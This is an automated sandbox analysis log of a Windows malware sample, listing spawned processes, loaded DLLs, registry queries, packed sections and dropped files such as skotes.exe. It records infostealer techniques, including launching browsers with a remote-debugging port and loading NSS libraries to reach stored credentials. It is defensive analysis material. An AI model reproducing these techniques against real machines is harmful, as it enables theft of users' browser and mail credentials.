Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6928 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6928 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5292 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=3404 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsJDAFHCGIJE.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsJDAFHCGIJE.exe "C:\Users\user\DocumentsJDAFHCGIJE.exe"
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7144 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsJDAFHCGIJE.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2196,i,8775659685558455544,10122295161962970873,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2352 --field-trial-handle=2012,i,9669449525995071965,9129735360253068169,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6928 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6928 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5292 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=3404 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Users\user\DocumentsJDAFHCGIJE.exe "C:\Users\user\DocumentsJDAFHCGIJE.exe"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7144 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:8	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsJDAFHCGIJE.exe "C:\Users\user\DocumentsJDAFHCGIJE.exe"
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: winmm.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: wininet.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: sspicli.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: mstask.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: wldp.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: mpr.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: dui70.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: duser.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: chartv.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: oleacc.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: winsta.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: textshaping.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: propsys.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: iertutil.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: profapi.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: edputil.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: urlmon.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: srvcli.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: netutils.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: appresolver.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: slc.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: userenv.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: sppc.dll
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1832960 > 1048576

Source: file.exe

Static PE information: Raw size of qttzyszk is bigger than: 0x100000 < 0x1a5800

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2692174444.000000006FD5D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2692174444.000000006FD5D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.f30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qttzyszk:EW;kydeomrz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qttzyszk:EW;kydeomrz:EW;.taggant:EW;
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Unpacked PE file: 25.2.DocumentsJDAFHCGIJE.exe.b10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sxkyywio:EW;kanpqnsy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sxkyywio:EW;kanpqnsy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 26.2.skotes.exe.3f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sxkyywio:EW;kanpqnsy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sxkyywio:EW;kanpqnsy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 28.2.skotes.exe.3f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sxkyywio:EW;kanpqnsy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sxkyywio:EW;kanpqnsy:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: DocumentsJDAFHCGIJE.exe.0.dr	Static PE information: real checksum: 0x1d845a should be: 0x1dea14
Source: file.exe	Static PE information: real checksum: 0x1c44f0 should be: 0x1cabf5
Source: bca166439f.exe.28.dr	Static PE information: real checksum: 0x43bdd6 should be: 0x23b7a7
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x43bdd6 should be: 0x23b7a7
Source: skotes.exe.25.dr	Static PE information: real checksum: 0x1d845a should be: 0x1dea14

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: qttzyszk
Source: file.exe	Static PE information: section name: kydeomrz
Source: file.exe	Static PE information: section name: .taggant
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: DocumentsJDAFHCGIJE.exe.0.dr	Static PE information: section name:
Source: DocumentsJDAFHCGIJE.exe.0.dr	Static PE information: section name: .idata
Source: DocumentsJDAFHCGIJE.exe.0.dr	Static PE information: section name:
Source: DocumentsJDAFHCGIJE.exe.0.dr	Static PE information: section name: sxkyywio
Source: DocumentsJDAFHCGIJE.exe.0.dr	Static PE information: section name: kanpqnsy
Source: DocumentsJDAFHCGIJE.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .rsrc
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: lklnedip
Source: random[1].exe.0.dr	Static PE information: section name: cepbmidj
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: skotes.exe.25.dr	Static PE information: section name:
Source: skotes.exe.25.dr	Static PE information: section name: .idata
Source: skotes.exe.25.dr	Static PE information: section name:
Source: skotes.exe.25.dr	Static PE information: section name: sxkyywio
Source: skotes.exe.25.dr	Static PE information: section name: kanpqnsy
Source: skotes.exe.25.dr	Static PE information: section name: .taggant
Source: bca166439f.exe.28.dr	Static PE information: section name:
Source: bca166439f.exe.28.dr	Static PE information: section name: .rsrc
Source: bca166439f.exe.28.dr	Static PE information: section name: .idata
Source: bca166439f.exe.28.dr	Static PE information: section name:
Source: bca166439f.exe.28.dr	Static PE information: section name: lklnedip
Source: bca166439f.exe.28.dr	Static PE information: section name: cepbmidj
Source: bca166439f.exe.28.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 28_2_0040D91C push ecx; ret

28_2_0040D92F

Source: file.exe	Static PE information: section name: qttzyszk entropy: 7.953435287157856
